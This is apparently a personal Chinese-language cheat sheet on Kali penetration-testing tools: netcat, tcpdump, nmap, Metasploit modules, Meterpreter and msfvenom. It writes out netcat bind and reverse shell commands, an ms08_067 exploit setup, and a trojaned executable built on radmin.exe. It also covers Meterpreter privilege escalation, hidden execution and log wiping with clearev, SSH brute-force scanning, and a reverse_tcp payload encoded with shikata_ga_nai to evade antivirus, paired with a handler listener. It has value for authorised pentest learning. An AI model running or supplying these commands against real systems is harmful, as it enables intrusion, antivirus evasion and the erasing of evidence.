kali工具使用


Kali工具使用

NETCAT -NC

nc -nv [ip_add] [port]      连接服务器,n:跟ip地址,不进行dns解析 v:详细内容   

传输文本信息:  
+ nc -l -p [port]             服务器端 l:侦听
+ nc -nv [ip_add] [port]      客户端进行连接  

传输文件/目录:  
    nc -lp [port] > file.mp4            接收端
    nc -nv [ip] [port] < file.mp4 -q 1  发送端

    nc -q 1 -lp [port] < file.mp4       发送端
    nc -nv [ip] [port] > file.mp4       接收端

tar -cvf - dir/ | nc -lp [port] -q 1    打包发送
nc [ip] [port] | tar -xvf -             接收解包

端口扫描:
nc -nvz -w 1 [ip] [port_range]          w:超时设定 z:扫描功能,默认tcp u:udp mode  

远程控制:
nc -lp [port] -c bash                   服务器端,被控制端 windows电脑bash换为cmd
nc [ip] [port]                          客户端,控制端

nc -lp [port]                           反向控制(获取shell)
nc -nv [ip] [port] -c bash              被控制端

tcpdump

tcpdump -i wlan0 -s 0 -w file.cap       s:size为0时抓取完整包
tcpdump [-A] [-X] -r file.cap           读取包文件,A详细信息,X十六进制显示
tcpdump -i wlan0 tcp port 22            filter
显示过滤:
tcpdump -n -r file.cap | awk '{print $3}' | sort -u    n:不进行dns解析,awk文本处理工具,显示第3行,u去除重复项
tcpdump -n src/dst host [ip] -r file.cap               显示指定源地址的包
tcpdump -n tcp port [] -r file.cap                     显示指定端口的包
tcpdump -A -n 'tcp[13]=24' -r file.cap                 显示过滤第14个字节为24的包,细化到字节过滤

nmap

nmap  
    -sn [ipadd]         ping扫描  
    -iL [addfile] -sn   调用地址列表文件扫描   
    -sU [ipadd]         UDP端口扫描,原理:icmp目标不可达  
    -O  [ipadd]         操作系统  
    -sV                 服务识别  
    -sS                 半连接扫描,隐蔽  
    -sT                 全连接扫描,建立tcp连接  

Metasploit

Modules(概况)

Exploits:                   漏洞利用攻击方法,流程  
    Active exploit          主动攻击,针对服务器,服务存在已知漏洞
    Passive exploit         被动攻击,针对客户机,诱使访问制定网站
Payload:                    目标机器执行的代码或指令
    single:all-in-one
    stager                  内存有限时输入的较小的payload用于连接
    stages                  利用stager建立连接下载的后续payload
Auxiliary                   辅助模块,没有payload的exploit模块
Encoders                    对payload进行加密,躲避病毒软件的查杀
Nops                        提高payload稳定性和维持大小  

MSF基本使用方法

show [modules]              显示所有可用模块
search [keywords]
    name:mysql
    path:windows
    type:exploit,payload
    platform:windows
use exploit/windows/smb/ms08_067_ntapi
info                    详细信息
    show options           
    show payloads
    show targets
    show advanced
    show missing            显示未配置选项
set options 
    setg,unsetg             设置全局变量
    RHOST 1.1.1.1
    RPORT 445
    target [2]              设置目标操作系统,可先是show targets查看,提高结果可靠性
set payload /pay/...        指定payload,可先是show payload查看
    LHOST                   设定攻击机ip
    LPORT        
use payload/windows/shell_bind_tcp
    generate -o /root/1.exe -k -x /usr/share/windows/radmin.exe -f exe  生成程序置于win下执行,获取shell
check                       检测是否可利用,部分exploit没有此功能
run,exploit
save                        保存配置
back                        返回上一级   

数据库相关

db_status
db_rebuild_cache            模块信息映射到数据库,提高相关查询时速度
db_disconnect -h
db_connect
db_nmap                     执行nmap命令,保存到数据库
    hosts 1.1.1.1
    hosts -u                列出状态为up的主机
    hosts -S                search
service -h                  列出所有服务,扫描结果的详细信息
vulns,creds,loot(hashdump)
db_import,export

session -l                  run -j后台运行后可查看
resource file.rc            原先写好执行脚本,执行命令 

载荷Meterpreter

高级payload     u盘实现???  
+ set payload /meterpreter/.. 获取shell,通过Meterpreter
+ getuid
+ getsystem                   获取system权限
+ getpid                      查看注入到哪个程序里
+ migrate [pid]               迁移注入进程
+ ls,cd,pwd,cat,ps            linux命令可执行
+ run/bgrun []                可通过-h产看可选项,exp:vnc
+ clearev                     清除目标机日志
+ download/upload             下载/上传目标机文件
+ execute -f cmd.exe -i -H    i:隐秘执行
+ load python                 加载python扩展

MSF–信息收集

主机发现:  
    use auxiliary/scanner/discovery/arp_sweep  
    set interface,threads...  
端口扫描:  
    use auxiliary/scanner/portscan/[syn]  
    set interface,threads...  
SNMP扫描:161  
    use auxiliary/scanner/snmp/snmp_login  
    snmp_enum  
    snmp_enumusers (windows)  
    snmp_enumshares(windows)  
SMB扫描:netbios 139,445  
    use auxiliary/scanner/smb/smb_version  
    use auxiliary/scanner/smb/pipe_auditor  
    use auxiliary/scanner/smb/pipe_dcerpc_auditor  
    use auxiliary/scanner/smb/smb_enumshares  
    use auxiliary/scanner/smb/smb_enumusers  
    use auxiliary/scanner/smb/smb_lookupsid  
SSH扫描:23  
    use auxiliary/scanner/ssh/ssh_version  
    use auxiliary/scanner/ssh/ssh_login  
    set userpass_file /usr/share/metasploit-framework/  data/wordlists/root_userpass.txt  
    set verbose false  
    use auxiliary/scanner/ssh/ssh_login_pubkey  利用已知密钥连接  
    set KEY_FILE id_rsa  
    set USERNAME root  
sqlserver扫描:  
FTP扫描: 

MSF–漏洞利用

MSF–客户端攻击

msfvenom --payload-options -p windows/shell/reverse_tcp 
    LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe
msfconsole  
    use exploit/multi/handler  
    set payload windows/shell/reverse_tcp  
    set LHOST 1.1.1.1  
    set LPORT 4444
exploit

  目录